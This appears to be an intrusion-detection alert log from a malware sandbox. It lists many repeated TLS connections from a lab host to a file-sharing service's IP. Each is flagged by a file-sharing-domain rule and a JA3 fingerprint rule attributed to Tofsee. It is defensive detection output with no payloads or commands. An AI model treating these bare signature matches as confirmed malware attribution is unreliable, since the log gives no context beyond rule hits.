TCP 192.168.56.101:49492 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49342 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49518 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49514 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49523 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49347 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49524 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49524 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49362 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49368 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49370 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49378 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49380 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49381 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49389 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49404 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49407 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49408 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49409 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49417 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49420 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49434 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49435 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49442 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49446 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49453 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49458 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49469 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49493 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49496 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49501 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49502 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49525 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49360 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49433 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49262 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49375 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49386 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49392 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49235 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49444 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49248 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49483 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49461 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49385 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49287 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49367 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49506 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49258 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49521 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49232 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49519 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49470 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49390 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49447 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49361 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49344 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
